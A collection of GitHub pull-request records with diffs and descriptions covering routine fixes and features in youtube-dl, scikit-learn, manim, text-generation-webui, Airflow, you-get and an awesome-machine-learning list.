libavformat 57. 41.100 / 57. 41.100 libavdevice 57. 0.101 / 57. 0.101 libavfilter 6. 47.100 / 6. 47.100 libavresample 3. 0. 0 / 3. 0. 0 libswscale 4. 1.100 / 4. 1.100 libswresample 2. 1.100 / 2. 1.100 libpostproc 54. 0.100 / 54. 
0.100 [2]- Done ffmpeg -version < /dev/null pb3:youtube-dl jhawk$ ``` While of course the best thing to do would be to fix ffmpeg, in the meantime youtube_dl should work around it. This patch closes stdin, analogous to calling ffmpeg with <&-. Another choice would be to use </dev/null (see 3cad576), which is arguably a little less fragile (what if ffmpeg calls open() and gets fd0 as the next fd) and a little clearer to read...
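A hedged, standalone sketch of the pattern this one-line fix applies (not the project's actual `get_exe_version` helper): when probing a tool's version from a process that may be backgrounded, hand the child a pipe for stdin so it can never block the job by trying to read the controlling terminal.

```python
import subprocess
from typing import Optional

def probe_version(exe: str = "ffmpeg") -> Optional[str]:
    """Return the first line of `exe -version` output, or None on failure."""
    try:
        out, _ = subprocess.Popen(
            [exe, "-version"],
            stdin=subprocess.PIPE,    # the added argument: no reads from the tty
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
        ).communicate()
    except OSError:
        return None
    return out.decode("ascii", "ignore").splitlines()[0] if out else None

if __name__ == "__main__":
    print(probe_version())
```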
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/10996
2016-10-22T00:58:36Z
2016-10-22T05:11:12Z
2016-10-22T05:11:12Z
2018-03-16T15:38:15Z
125
ytdl-org/youtube-dl
50,569
ENH Improve warnings if func returns a dataframe in FunctionTransformer
diff --git a/doc/whats_new/v1.4.rst b/doc/whats_new/v1.4.rst index 8dbd867b0c9ba..c56e67024a890 100644 --- a/doc/whats_new/v1.4.rst +++ b/doc/whats_new/v1.4.rst @@ -250,6 +250,13 @@ Changelog - |Enhancement| Added `neg_root_mean_squared_log_error_scorer` as scorer :pr:`26734` by :user:`Alejandro Martin Gil <101AlexMartin>`. +:mod:`sklearn.preprocessing` +............................ + +- |Enhancement| Improves warnings in :class:`preprocessing.FunctionTransfomer` when + `func` returns a pandas dataframe and the output is configured to be pandas. + :pr:`26944` by `Thomas Fan`_. + :mod:`sklearn.model_selection` .............................. diff --git a/sklearn/preprocessing/_function_transformer.py b/sklearn/preprocessing/_function_transformer.py index f1df0f43dc96e..fa755265d7bc2 100644 --- a/sklearn/preprocessing/_function_transformer.py +++ b/sklearn/preprocessing/_function_transformer.py @@ -4,10 +4,12 @@ from ..base import BaseEstimator, TransformerMixin, _fit_context from ..utils._param_validation import StrOptions +from ..utils._set_output import _get_output_config from ..utils.metaestimators import available_if from ..utils.validation import ( _allclose_dense_sparse, _check_feature_names_in, + _is_pandas_df, check_array, ) @@ -237,7 +239,20 @@ def transform(self, X): Transformed input. """ X = self._check_input(X, reset=False) - return self._transform(X, func=self.func, kw_args=self.kw_args) + out = self._transform(X, func=self.func, kw_args=self.kw_args) + + output_config = _get_output_config("transform", self)["dense"] + if ( + output_config == "pandas" + and self.feature_names_out is None + and not _is_pandas_df(out) + ): + warnings.warn( + "When `set_output` is configured to be 'pandas', `func` should return " + "a DataFrame to follow the `set_output` API or `feature_names_out` " + "should be defined." + ) + return out def inverse_transform(self, X): """Transform X using the inverse function. @@ -338,13 +353,8 @@ def set_output(self, *, transform=None): self : estimator instance Estimator instance. """ - if hasattr(super(), "set_output"): - return super().set_output(transform=transform) - - if transform == "pandas" and self.feature_names_out is None: - warnings.warn( - 'With transform="pandas", `func` should return a DataFrame to follow' - " the set_output API." 
- ) + if not hasattr(self, "_sklearn_output_config"): + self._sklearn_output_config = {} + self._sklearn_output_config["transform"] = transform return self diff --git a/sklearn/preprocessing/tests/test_function_transformer.py b/sklearn/preprocessing/tests/test_function_transformer.py index d843f56002619..c4b2f79f288f0 100644 --- a/sklearn/preprocessing/tests/test_function_transformer.py +++ b/sklearn/preprocessing/tests/test_function_transformer.py @@ -451,13 +451,26 @@ def test_set_output_func(): assert isinstance(X_trans, pd.DataFrame) assert_array_equal(X_trans.columns, ["a", "b"]) - # If feature_names_out is not defined, then a warning is raised in - # `set_output` ft = FunctionTransformer(lambda x: 2 * x) - msg = "should return a DataFrame to follow the set_output API" - with pytest.warns(UserWarning, match=msg): - ft.set_output(transform="pandas") + ft.set_output(transform="pandas") - X_trans = ft.fit_transform(X) + # no warning is raised when func returns a panda dataframe + with warnings.catch_warnings(): + warnings.simplefilter("error", UserWarning) + X_trans = ft.fit_transform(X) assert isinstance(X_trans, pd.DataFrame) assert_array_equal(X_trans.columns, ["a", "b"]) + + # Warning is raised when func returns a ndarray + ft_np = FunctionTransformer(lambda x: np.asarray(x)) + ft_np.set_output(transform="pandas") + + msg = "When `set_output` is configured to be 'pandas'" + with pytest.warns(UserWarning, match=msg): + ft_np.fit_transform(X) + + # default transform does not warn + ft_np.set_output(transform="default") + with warnings.catch_warnings(): + warnings.simplefilter("error", UserWarning) + ft_np.fit_transform(X)
<!-- Thanks for contributing a pull request! Please ensure you have taken a look at the contribution guidelines: https://github.com/scikit-learn/scikit-learn/blob/main/CONTRIBUTING.md --> #### Reference Issues/PRs <!-- Example: Fixes #1234. See also #3456. Please use keywords (e.g., Fixes) to create link to the issues or pull requests you resolved, so that they will automatically be closed when your pull request is merged. See https://github.com/blog/1506-closing-issues-via-pull-requests --> Closes https://github.com/scikit-learn/scikit-learn/issues/26552 #### What does this implement/fix? Explain your changes. This PR implements the suggestion in https://github.com/scikit-learn/scikit-learn/issues/26552#issuecomment-1594815165. The warning is now delayed to `transform` and not in `set_output`. <!-- Please be aware that we are a loose team of volunteers so patience is necessary; assistance handling other issues is very welcome. We value all user contributions, no matter how minor they are. If we are slow to review, either the pull request needs some benchmarking, tinkering, convincing, etc. or more likely the reviewers are simply busy. In either case, we ask for your understanding during the review process. For more information, see our FAQ on this topic: http://scikit-learn.org/dev/faq.html#why-is-my-pull-request-not-getting-any-attention. Thanks for contributing! -->
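A hedged sketch of the new behaviour, adapted from the tests added in the diff (assumes a scikit-learn release that contains this change): the warning is raised lazily in `transform`, and only when `func` does not return a DataFrame while pandas output is requested.

```python
import numpy as np
import pandas as pd
from sklearn.preprocessing import FunctionTransformer

X = pd.DataFrame({"a": [1, 2, 3], "b": [10, 20, 30]})

ft = FunctionTransformer(lambda df: 2 * df)              # func returns a DataFrame
ft.set_output(transform="pandas")
ft.fit_transform(X)                                      # no warning

ft_np = FunctionTransformer(lambda df: np.asarray(df))   # func returns an ndarray
ft_np.set_output(transform="pandas")
ft_np.fit_transform(X)                                   # UserWarning raised here, not in set_output
```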
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/26944
2023-07-30T22:49:54Z
2023-09-19T17:10:38Z
2023-09-19T17:10:38Z
2023-09-19T17:10:47Z
1,140
scikit-learn/scikit-learn
46,180
Add Practical Gradient Boosting
diff --git a/books.md b/books.md index cab2362d..733e0abe 100644 --- a/books.md +++ b/books.md @@ -101,6 +101,8 @@ The following is a list of free and/or open source books on machine learning, st * [Natural Language Processing in Action, Second Edition](https://www.manning.com/books/natural-language-processing-in-action-second-edition) Early access book * [Getting Started with Natural Language Processing in Action](https://www.manning.com/books/getting-started-with-natural-language-processing) Early access book * [Transfer Learnin for Natural Language Processing](https://www.manning.com/books/transfer-learning-for-natural-language-processing) by Paul Azunre +* [Practical Gradient Boosting](https://www.amazon.com/dp/B0BL1HRD6Z) by Guillaume Saupin + ## Information Retrieval
Hello, I'd like to add my book on gradient boosting in the book section. It's the English edition of my book `Gradient Boosting`, published by the Editions Eni: https://www.editions-eni.fr/livre/gradient-boosting-exploitez-les-arbres-de-decision-pour-le-machine-learning-xgboost-catboost-lightgbm-9782409034022 I think it's a valuable resource for learning gradient boosting (XGBoost, LightGBM, CatBoost, ...)
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/927
2023-04-11T13:18:46Z
2023-04-12T00:40:03Z
2023-04-12T00:40:03Z
2023-04-12T00:40:03Z
198
josephmisiti/awesome-machine-learning
52,409
Fix a logistic bug
diff --git a/manimlib/mobject/svg/string_mobject.py b/manimlib/mobject/svg/string_mobject.py index 5004960e61..e4376a3360 100644 --- a/manimlib/mobject/svg/string_mobject.py +++ b/manimlib/mobject/svg/string_mobject.py @@ -174,8 +174,8 @@ def find_spans_by_single_selector(sel): ): l = self.full_span[1] span = tuple( + default_index if index is None else min(index, l) if index >= 0 else max(index + l, 0) - if index is not None else default_index for index, default_index in zip(sel, self.full_span) ) return [span]
## Motivation There's a logic bug when handling `None` in spans. My apologies for that. ## Proposed changes - M `manimlib/mobject/svg/string_mobject.py`
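A hedged illustration of why the operand order in the diff matters (the values below are made up for the example): a chained conditional expression groups to the right, so the original ordering still evaluated `index >= 0` when `index` was `None`, which raises `TypeError` on Python 3; hoisting the `is None` check to the front avoids that.

```python
l = 10
index, default_index = None, 0

# Fixed ordering from the diff: the None check runs first.
span_end = default_index if index is None else min(index, l) if index >= 0 else max(index + l, 0)
print(span_end)  # 0

# Original ordering: the `is not None` guard came too late to protect `index >= 0`.
try:
    span_end = min(index, l) if index >= 0 else max(index + l, 0) if index is not None else default_index
except TypeError as exc:
    print(exc)  # '>=' not supported between instances of 'NoneType' and 'int'
```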
https://api.github.com/repos/3b1b/manim/pulls/1815
2022-05-20T10:55:13Z
2022-05-20T10:56:40Z
2022-05-20T10:56:40Z
2022-05-20T10:56:41Z
168
3b1b/manim
18,321
Use separate llama-cpp-python packages for GGML support
diff --git a/download-model.py b/download-model.py index be8d59fe09..3bb4a39bc7 100644 --- a/download-model.py +++ b/download-model.py @@ -57,7 +57,8 @@ def get_download_links_from_huggingface(self, model, branch, text_only=False): classifications = [] has_pytorch = False has_pt = False - # has_gguf = False + has_gguf = False + has_ggml = False has_safetensors = False is_lora = False while True: @@ -79,6 +80,7 @@ def get_download_links_from_huggingface(self, model, branch, text_only=False): is_safetensors = re.match(r".*\.safetensors", fname) is_pt = re.match(r".*\.pt", fname) is_gguf = re.match(r'.*\.gguf', fname) + is_ggml = re.match(r".*ggml.*\.bin", fname) is_tokenizer = re.match(r"(tokenizer|ice|spiece).*\.model", fname) is_text = re.match(r".*\.(txt|json|py|md)", fname) or is_tokenizer if any((is_pytorch, is_safetensors, is_pt, is_gguf, is_tokenizer, is_text)): @@ -102,8 +104,11 @@ def get_download_links_from_huggingface(self, model, branch, text_only=False): has_pt = True classifications.append('pt') elif is_gguf: - # has_gguf = True + has_gguf = True classifications.append('gguf') + elif is_ggml: + has_ggml = True + classifications.append('ggml') cursor = base64.b64encode(f'{{"file_name":"{dict[-1]["path"]}"}}'.encode()) + b':50' cursor = base64.b64encode(cursor) @@ -115,6 +120,12 @@ def get_download_links_from_huggingface(self, model, branch, text_only=False): if classifications[i] in ['pytorch', 'pt']: links.pop(i) + # If both GGML and GGUF are available, download GGUF only + if has_ggml and has_gguf: + for i in range(len(classifications) - 1, -1, -1): + if classifications[i] == 'ggml': + links.pop(i) + return links, sha256, is_lora def get_output_folder(self, model, branch, is_lora, base_folder=None): diff --git a/modules/llamacpp_hf.py b/modules/llamacpp_hf.py index 0608cb016c..a2dcb34b99 100644 --- a/modules/llamacpp_hf.py +++ b/modules/llamacpp_hf.py @@ -9,23 +9,38 @@ from modules import RoPE, shared from modules.logging_colors import logger +from modules.utils import is_gguf import llama_cpp +try: + import llama_cpp_ggml +except: + llama_cpp_ggml = llama_cpp + if torch.cuda.is_available() and not torch.version.hip: try: import llama_cpp_cuda except: llama_cpp_cuda = None + try: + import llama_cpp_ggml_cuda + except: + llama_cpp_ggml_cuda = llama_cpp_cuda else: llama_cpp_cuda = None + llama_cpp_ggml_cuda = None -def llama_cpp_lib(): +def llama_cpp_lib(model_file: Union[str, Path] = None): + if model_file is not None: + gguf_model = is_gguf(model_file) + else: + gguf_model = True if shared.args.cpu or llama_cpp_cuda is None: - return llama_cpp + return llama_cpp if gguf_model else llama_cpp_ggml else: - return llama_cpp_cuda + return llama_cpp_cuda if gguf_model else llama_cpp_ggml_cuda class LlamacppHF(PreTrainedModel): @@ -165,7 +180,7 @@ def from_pretrained(cls, pretrained_model_name_or_path: Optional[Union[str, os.P if path.is_file(): model_file = path else: - model_file = list(path.glob('*.gguf*'))[0] + model_file = (list(path.glob('*.gguf*')) + list(path.glob('*ggml*.bin')))[0] logger.info(f"llama.cpp weights detected: {model_file}\n") @@ -188,12 +203,17 @@ def from_pretrained(cls, pretrained_model_name_or_path: Optional[Union[str, os.P 'rope_freq_base': RoPE.get_rope_freq_base(shared.args.alpha_value, shared.args.rope_freq_base), 'tensor_split': tensor_split_list, 'rope_freq_scale': 1.0 / shared.args.compress_pos_emb, - 'n_gqa': shared.args.n_gqa or None, - 'rms_norm_eps': shared.args.rms_norm_eps or None, 'logits_all': True, } + + if not is_gguf(model_file): + 
ggml_params = { + 'n_gqa': shared.args.n_gqa or None, + 'rms_norm_eps': shared.args.rms_norm_eps or None, + } + params = params | ggml_params - Llama = llama_cpp_lib().Llama + Llama = llama_cpp_lib(model_file).Llama model = Llama(**params) return LlamacppHF(model) diff --git a/modules/llamacpp_model.py b/modules/llamacpp_model.py index d2893b0dda..4908ecb72b 100644 --- a/modules/llamacpp_model.py +++ b/modules/llamacpp_model.py @@ -1,5 +1,7 @@ import re from functools import partial +from pathlib import Path +from typing import Union import torch @@ -7,23 +9,38 @@ from modules.callbacks import Iteratorize from modules.logging_colors import logger from modules.text_generation import get_max_prompt_length +from modules.utils import is_gguf import llama_cpp +try: + import llama_cpp_ggml +except: + llama_cpp_ggml = llama_cpp + if torch.cuda.is_available() and not torch.version.hip: try: import llama_cpp_cuda except: llama_cpp_cuda = None + try: + import llama_cpp_ggml_cuda + except: + llama_cpp_ggml_cuda = llama_cpp_cuda else: llama_cpp_cuda = None + llama_cpp_ggml_cuda = None -def llama_cpp_lib(): +def llama_cpp_lib(model_file: Union[str, Path] = None): + if model_file is not None: + gguf_model = is_gguf(model_file) + else: + gguf_model = True if shared.args.cpu or llama_cpp_cuda is None: - return llama_cpp + return llama_cpp if gguf_model else llama_cpp_ggml else: - return llama_cpp_cuda + return llama_cpp_cuda if gguf_model else llama_cpp_ggml_cuda def ban_eos_logits_processor(eos_token, input_ids, logits): @@ -41,8 +58,8 @@ def __del__(self): @classmethod def from_pretrained(self, path): - Llama = llama_cpp_lib().Llama - LlamaCache = llama_cpp_lib().LlamaCache + Llama = llama_cpp_lib(str(path)).Llama + LlamaCache = llama_cpp_lib(str(path)).LlamaCache result = self() cache_capacity = 0 @@ -75,9 +92,14 @@ def from_pretrained(self, path): 'rope_freq_base': RoPE.get_rope_freq_base(shared.args.alpha_value, shared.args.rope_freq_base), 'tensor_split': tensor_split_list, 'rope_freq_scale': 1.0 / shared.args.compress_pos_emb, - 'n_gqa': shared.args.n_gqa or None, - 'rms_norm_eps': shared.args.rms_norm_eps or None, } + + if not is_gguf(str(path)): + ggml_params = { + 'n_gqa': shared.args.n_gqa or None, + 'rms_norm_eps': shared.args.rms_norm_eps or None, + } + params = params | ggml_params result.model = Llama(**params) if cache_capacity > 0: diff --git a/modules/models.py b/modules/models.py index 5268a2fc76..3025fe3d8a 100644 --- a/modules/models.py +++ b/modules/models.py @@ -241,7 +241,7 @@ def llamacpp_loader(model_name): if path.is_file(): model_file = path else: - model_file = list(Path(f'{shared.args.model_dir}/{model_name}').glob('*.gguf*'))[0] + model_file = (list(Path(f'{shared.args.model_dir}/{model_name}').glob('*.gguf*')) + list(Path(f'{shared.args.model_dir}/{model_name}').glob('*ggml*.bin')))[0] logger.info(f"llama.cpp weights detected: {model_file}") model, tokenizer = LlamaCppModel.from_pretrained(model_file) diff --git a/modules/models_settings.py b/modules/models_settings.py index 2ed658b8c2..c55b1e884f 100644 --- a/modules/models_settings.py +++ b/modules/models_settings.py @@ -24,9 +24,9 @@ def infer_loader(model_name): loader = None elif Path(f'{shared.args.model_dir}/{model_name}/quantize_config.json').exists() or ('wbits' in model_settings and type(model_settings['wbits']) is int and model_settings['wbits'] > 0): loader = 'AutoGPTQ' - elif len(list(path_to_model.glob('*.gguf*'))) > 0: + elif len(list(path_to_model.glob('*.gguf*')) + list(path_to_model.glob('*ggml*.bin'))) > 
0: loader = 'llama.cpp' - elif re.match(r'.*\.gguf', model_name.lower()): + elif re.match(r'.*\.gguf|.*ggml.*\.bin', model_name.lower()): loader = 'llama.cpp' elif re.match(r'.*rwkv.*\.pth', model_name.lower()): loader = 'RWKV' diff --git a/modules/utils.py b/modules/utils.py index 0a7edffaaa..3862817dad 100644 --- a/modules/utils.py +++ b/modules/utils.py @@ -2,6 +2,7 @@ import re from datetime import datetime from pathlib import Path +from typing import Union from modules import shared from modules.logging_colors import logger @@ -124,3 +125,11 @@ def get_datasets(path: str, ext: str): def get_available_chat_styles(): return sorted(set(('-'.join(k.stem.split('-')[1:]) for k in Path('css').glob('chat_style*.css'))), key=natural_keys) + +# Determines if a llama.cpp model is in GGUF format +# Copied from ctransformers utils.py +def is_gguf(path: Union[str, Path]) -> bool: + path = str(Path(path).resolve()) + with open(path, "rb") as f: + magic = f.read(4) + return magic == "GGUF".encode() diff --git a/requirements.txt b/requirements.txt index a28d87ee7a..0c6aeb1b89 100644 --- a/requirements.txt +++ b/requirements.txt @@ -35,6 +35,11 @@ https://github.com/abetlen/llama-cpp-python/releases/download/v0.1.79/llama_cpp_ # llama-cpp-python with CUDA support https://github.com/jllllll/llama-cpp-python-cuBLAS-wheels/releases/download/textgen-webui/llama_cpp_python_cuda-0.1.79+cu117-cp310-cp310-win_amd64.whl; platform_system == "Windows" https://github.com/jllllll/llama-cpp-python-cuBLAS-wheels/releases/download/textgen-webui/llama_cpp_python_cuda-0.1.79+cu117-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" +# llama-cpp-python with GGML support +https://github.com/jllllll/llama-cpp-python-cuBLAS-wheels/releases/download/cpu/llama_cpp_python_ggml-0.1.78+cpuavx2-cp310-cp310-win_amd64.whl; platform_system == "Windows" +https://github.com/jllllll/llama-cpp-python-cuBLAS-wheels/releases/download/cpu/llama_cpp_python_ggml-0.1.78+cpuavx2-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" +https://github.com/jllllll/llama-cpp-python-cuBLAS-wheels/releases/download/textgen-webui/llama_cpp_python_ggml_cuda-0.1.78+cu117-cp310-cp310-win_amd64.whl; platform_system == "Windows" +https://github.com/jllllll/llama-cpp-python-cuBLAS-wheels/releases/download/textgen-webui/llama_cpp_python_ggml_cuda-0.1.78+cu117-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" # GPTQ-for-LLaMa https://github.com/jllllll/GPTQ-for-LLaMa-CUDA/releases/download/0.1.0/gptq_for_llama-0.1.0+cu117-cp310-cp310-win_amd64.whl; platform_system == "Windows"
## Checklist: - [x] I have read the [Contributing guidelines](https://github.com/oobabooga/text-generation-webui/wiki/Contributing-guidelines). --- Based on: https://github.com/oobabooga/text-generation-webui/pull/3695 This will maintain full GGML support while allowing llama-cpp-python to be updated. Intended to be temporary until more models are converted to GGUF, but can be a long term solution if desired.
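A hedged, self-contained sketch of the format check this PR relies on, mirroring the `is_gguf` helper added to `modules/utils.py` in the diff: GGUF files start with the four-byte magic `GGUF`, which lets the loader route each model file to the matching llama-cpp-python package.

```python
from pathlib import Path
from typing import Union

def is_gguf(path: Union[str, Path]) -> bool:
    """Return True if the file begins with the GGUF magic bytes."""
    with open(Path(path).resolve(), "rb") as f:
        return f.read(4) == b"GGUF"

# Illustrative routing only (package names as used in the requirements above):
def pick_backend(model_file: str) -> str:
    return "llama_cpp" if is_gguf(model_file) else "llama_cpp_ggml"
```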
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/3697
2023-08-26T18:29:19Z
2023-08-27T04:51:00Z
2023-08-27T04:51:00Z
2023-09-25T01:22:21Z
3,188
oobabooga/text-generation-webui
26,530
Adds auto_ml and machineJS- automated machine learning
diff --git a/README.md b/README.md index 2e8fefcc..3588d80c 100644 --- a/README.md +++ b/README.md @@ -438,6 +438,7 @@ For a list of free-to-attend meetups and local events, go [here](https://github. * [LDA.js](https://github.com/primaryobjects/lda) - LDA topic modeling for node.js * [Learning.js](https://github.com/yandongliu/learningjs) - Javascript implementation of logistic regression/c4.5 decision tree * [Machine Learning](http://joonku.com/project/machine_learning) - Machine learning library for Node.js +* [machineJS](https://github.com/ClimbsRocks/machineJS) - Automated machine learning, data formatting, ensembling, and hyperparameter optimization for competitions and exploration- just give it a .csv file! * [mil-tokyo](https://github.com/mil-tokyo) - List of several machine learning libraries * [Node-SVM](https://github.com/nicolaspanel/node-svm) - Support Vector Machine for nodejs * [Brain](https://github.com/harthur/brain) - Neural networks in JavaScript **[Deprecated]** @@ -760,6 +761,7 @@ on MNIST digits[DEEP LEARNING] <a name="python-general-purpose" /> #### General-Purpose Machine Learning +* [auto_ml](https://github.com/ClimbsRocks/auto_ml) - Automated machine learning pipelines for analytics and production. Handles some standard feature engineering, feature selection, model selection, model tuning, ensembling, and advanced scoring, in addition to logging output for analysts trying to understand their datasets. * [machine learning](https://github.com/jeff1evesque/machine-learning) - automated build consisting of a [web-interface](https://github.com/jeff1evesque/machine-learning#web-interface), and set of [programmatic-interface](https://github.com/jeff1evesque/machine-learning#programmatic-interface) API, for support vector machines. Corresponding dataset(s) are stored into a SQL database, then generated model(s) used for prediction(s), are stored into a NoSQL datastore. * [XGBoost](https://github.com/dmlc/xgboost) - Python bindings for eXtreme Gradient Boosting (Tree) Library * [Bayesian Methods for Hackers](https://github.com/CamDavidsonPilon/Probabilistic-Programming-and-Bayesian-Methods-for-Hackers) - Book/iPython notebooks on Probabilistic Programming in Python
Thanks for maintaining this project! I already found a few new projects on here I want to add into auto_ml.
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/335
2016-12-06T19:51:52Z
2016-12-06T20:18:04Z
2016-12-06T20:18:04Z
2016-12-06T20:18:04Z
570
josephmisiti/awesome-machine-learning
51,842
Don't log CLI actions if db not initialized
diff --git a/airflow/utils/cli_action_loggers.py b/airflow/utils/cli_action_loggers.py index 17a4c4f890b22..0c93148308fbc 100644 --- a/airflow/utils/cli_action_loggers.py +++ b/airflow/utils/cli_action_loggers.py @@ -97,6 +97,8 @@ def default_action_log(sub_command, user, task_id, dag_id, execution_date, host_ :param **_: other keyword arguments that is not being used by this function :return: None """ + from sqlalchemy.exc import OperationalError, ProgrammingError + from airflow.models.log import Log from airflow.utils import timezone from airflow.utils.session import create_session @@ -121,8 +123,18 @@ def default_action_log(sub_command, user, task_id, dag_id, execution_date, host_ } ], ) - except Exception as error: - logging.warning("Failed to log action with %s", error) + except (OperationalError, ProgrammingError) as e: + expected = [ + '"log" does not exist', # postgres + "no such table", # sqlite + "log' doesn't exist", # mysql + "Invalid object name 'log'", # mssql + ] + error_is_ok = e.args and any(x in e.args[0] for x in expected) + if not error_is_ok: + logging.warning("Failed to log action %s", e) + except Exception as e: + logging.warning("Failed to log action %s", e) __pre_exec_callbacks: list[Callable] = []
This gets rid of a potentially confusing error message. Before: <img width="441" alt="image" src="https://user-images.githubusercontent.com/15932138/203466778-de475387-9caa-4ca9-a56e-a3809593fab6.png"> After: <img width="426" alt="image" src="https://user-images.githubusercontent.com/15932138/203466794-8450909a-9693-4caf-989b-6a54d1b024fb.png">
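A hedged, generic sketch of the pattern in the diff (not Airflow's actual module): expected "log table does not exist" database errors are swallowed quietly, while anything unexpected still produces the warning.

```python
import logging

EXPECTED_FRAGMENTS = (
    '"log" does not exist',        # postgres
    "no such table",               # sqlite
    "log' doesn't exist",          # mysql
    "Invalid object name 'log'",   # mssql
)

def record_cli_action(write_to_db) -> None:
    try:
        write_to_db()
    except Exception as exc:  # stand-in for sqlalchemy OperationalError/ProgrammingError
        error_is_ok = bool(exc.args) and any(f in str(exc.args[0]) for f in EXPECTED_FRAGMENTS)
        if not error_is_ok:
            logging.warning("Failed to log action %s", exc)
```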
https://api.github.com/repos/apache/airflow/pulls/27851
2022-11-23T04:00:00Z
2022-12-03T06:32:28Z
2022-12-03T06:32:28Z
2023-01-09T23:14:04Z
372
apache/airflow
14,662
Add Windows installation documentation
diff --git a/docs/source/installation/windows.rst b/docs/source/installation/windows.rst index 7618c4a87c..bbea877c62 100644 --- a/docs/source/installation/windows.rst +++ b/docs/source/installation/windows.rst @@ -1,4 +1,60 @@ Windows ======= -A stub for windows installation +Install System Libraries +------------------------ + +Make sure you have *Python 3* for Windows installed first: + +https://www.python.org/downloads/windows/ + +Install ffmpeg: + +https://ffmpeg.org/download.html#build-windows + +Install sox: + +http://sox.sourceforge.net/Main/HomePage + +Install a latex distribution. On Windows MikTex is commonly used: + +https://miktex.org/howto/install-miktex + +Path configuration +------------------ + +To invoke commandline without supplying path to the binary +the PATH environment needs to be configured. Below are template examples, please change +the path according to your username and specific python version. Assuming all the +softwares are installed with no alteration to the installation paths:: + + C:\Users\$username\AppData\local\Programs\Python\Python$version\ + C:\Users\$username\AppData\local\Programs\Python\Python$version\Scripts\ + C:\MikTex\miktex\bin\x64\ + C:\ffmpeg\bin\ + +The path entries should be separated by semicolon. + +Installing python packages and manim +------------------------------------ + +Make sure you can start pip using ``pip`` in your commandline. Then do +``pip install pyreadline`` for the ``readline`` package. + +Grab the pycairo wheel binary ``pycairo‑1.18.0‑cp37‑cp37m‑win32.whl`` from https://www.lfd.uci.edu/~gohlke/pythonlibs/#pycairo +and install it via ``pip C:\absolute\path\to\the\whl\file`` + +clone the manim repository if you have git ``git clone https://github.com/3b1b/manim`` or download the zip file from +the repository page with ``Clone or download`` button and unzip it. + +Open the commandline within the manim directory with ``Shift + Right click`` on an empty space in the folder and select ``open command window here`` + +Install manim python dependencies with ``pip install -r requirement.txt`` + +Test the installation +--------------------- + +Type in ``python -m manim -h`` and if nothing went wrong during the installtion process you should see the help text. + +Use ``python -m manim example_scene.py SquareToCircle -pl`` to render the example scene and the file should play after rendering. The movie file should be +in ``media/videos/example_scenes/480p15``
The installation was done on a Windows 8 machine; further testing is needed for Windows 10: for example, ``python`` will launch just fine here, while doing so there could result in a command not found in cmd.exe. Also, I omitted the PyPI installation: for some reason the pycairo whl install gets removed and forces a recompile, which #555 is supposed to fix? Or maybe PyPI just hasn't been updated yet? Installing collected packages: pycairo, manimlib Found existing installation: pycairo 1.18.0 Uninstalling pycairo-1.18.0: Successfully uninstalled pycairo-1.18.0 Running setup.py install for pycairo ... error ERROR: Complete output from command 'c:\users\k\appdata\local\programs\python\python37-32\python.exe' -u -c 'import setuptools, tokenize;__file__='"'"'C:\\Users\\K\\AppData\\Local\\Temp\\pip-install-302sb5sa\\pycairo\\setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' install --record 'C:\Users\K\AppData\Local\Temp\pip-record-6iskt02e\install-record.txt' --single-version-externally-managed --compile: ERROR: running install running build running build_py creating build creating build\lib.win32-3.7 creating build\lib.win32-3.7\cairo copying cairo\__init__.py -> build\lib.win32-3.7\cairo copying cairo\__init__.pyi -> build\lib.win32-3.7\cairo copying cairo\py.typed -> build\lib.win32-3.7\cairo running build_ext building 'cairo._cairo' extension error: Microsoft Visual C++ 14.0 is required. Get it with "Microsoft Visual C++ Build Tools": https://visualstudio.microsoft.com/downloads/ And the build tool is quite large. manim runs fine using the repo though.
https://api.github.com/repos/3b1b/manim/pulls/561
2019-05-28T20:32:09Z
2019-05-29T02:08:36Z
2019-05-29T02:08:36Z
2019-05-30T01:50:33Z
631
3b1b/manim
18,074
[Ximalaya] fix #1955
diff --git a/src/you_get/extractors/ximalaya.py b/src/you_get/extractors/ximalaya.py index 58a158ba57..58e2945cb2 100644 --- a/src/you_get/extractors/ximalaya.py +++ b/src/you_get/extractors/ximalaya.py @@ -15,7 +15,8 @@ def ximalaya_download_by_id(id, title = None, output_dir = '.', info_only = False, stream_id = None): BASE_URL = 'http://www.ximalaya.com/tracks/' - json_data = json.loads(get_content(BASE_URL + id + '.json')) + json_url = BASE_URL + id + '.json' + json_data = json.loads(get_content(json_url, headers=fake_headers)) if 'res' in json_data: if json_data['res'] == False: raise ValueError('Server reported id %s is invalid' % id)
Now the ximalaya API server checks the UA. If 'python' (case insensitive) appears in the UA, it returns empty content instead of a JSON string. ``` curl 'http://www.ximalaya.com/tracks/330957273.json' -H 'user-agent: python-urllib/3.5' ``` returns nothing ``` curl 'http://www.ximalaya.com/tracks/3.json' -H 'user-agent: ython-urllib/3.5' {"res":false} ``` ``` ./you-get -d 'http://www.ximalaya.com/2982325/sound/30957273' [DEBUG] get_content: http://www.ximalaya.com/tracks/30957273.json [DEBUG] ximalaya_download_by_id: http://audio.xmcdn.com/group24/M04/9E/A9/wKgJMFiq4_iDnkMKAZ_V_DLoKG4117.m4a Site: ximalaya.com title: 01游玩天桥 Type: MPEG-4 audio m4a Size: N/A Downloading 01游玩天桥.m4a ... 100% ( 26.0/ 26.0MB) ├█████████████████████████████████████████┤[1/1] 2 MB/s ```
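A hedged, standalone sketch of the workaround (not you-get's actual `get_content`/`fake_headers` helpers): the essential point is to send a User-Agent that does not contain the substring "python".

```python
import json
from urllib.request import Request, urlopen

def fetch_track_json(track_id: str) -> dict:
    url = f"http://www.ximalaya.com/tracks/{track_id}.json"
    # Any UA without "python" in it works; the stock urllib UA does not.
    req = Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with urlopen(req) as resp:
        return json.loads(resp.read().decode("utf-8"))
```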
https://api.github.com/repos/soimort/you-get/pulls/1956
2017-05-09T02:30:02Z
2017-05-09T02:33:57Z
2017-05-09T02:33:57Z
2017-05-09T02:44:38Z
209
soimort/you-get
21,238
Fix incorrect space before colon in if/while stmts
